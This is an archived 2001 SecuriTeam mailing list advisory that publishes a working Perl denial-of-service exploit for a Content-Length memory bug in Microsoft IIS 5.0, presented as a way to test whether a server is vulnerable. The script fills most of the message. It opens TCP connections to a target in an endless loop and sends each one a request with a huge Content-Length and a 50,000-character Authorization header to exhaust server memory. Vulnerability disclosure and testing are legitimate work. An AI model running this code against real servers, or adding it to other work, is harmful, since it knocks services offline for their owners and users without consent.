[EXPL] Microsoft IIS/5.0 Content-Length DoS Exploit Code
From: support@securiteam.comDate: 12/13/01
- Previous message: support@securiteam.com: "[NT] Microsoft IIS/5 Bogus Content-Length Memory Bug"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Thu, 13 Dec 2001 08:23:56 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Microsoft IIS/5.0 Content-Length DoS Exploit Code
------------------------------------------------------------------------
SUMMARY
As we reported in our previous post:
<http://www.securiteam.com/windowsntfocus/6W00F0K3FW.html> Microsoft IIS/5
Bogus Content-Length Memory Bug, a security vulnerability in IIS allows a
remote attacker to cause the server to consume a large amount memory. The
following is an exploit code that can be used to determine whether you are
vulnerable or not.
DETAILS
Exploit:
# Written by Ivan Hernandez over code of Georgi Guninski
use IO::Socket;
print "IIS 5.0 Bogus Content-Length\n";
$port = @ARGV[1];
$host = @ARGV[0];
$req="GET /ampgn HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic " . "A" x 50000 . "\r\n\r\n";
$i=0;
while (1) {
$socket[$i] = IO::Socket::INET->new(PeerAddr =>
$host,PeerPort => $port,Proto => "TCP");
syswrite($socket[$i],$req,length($req));
print ".";
$i++;
}
$i=0;
print "\nDone.";
ADDITIONAL INFORMATION
The information has been provided by
<mailto:ivan.hernandez@globalsis.com.ar> Ivan Hernandez Puga.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Microsoft IIS/5 Bogus Content-Length Memory Bug"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|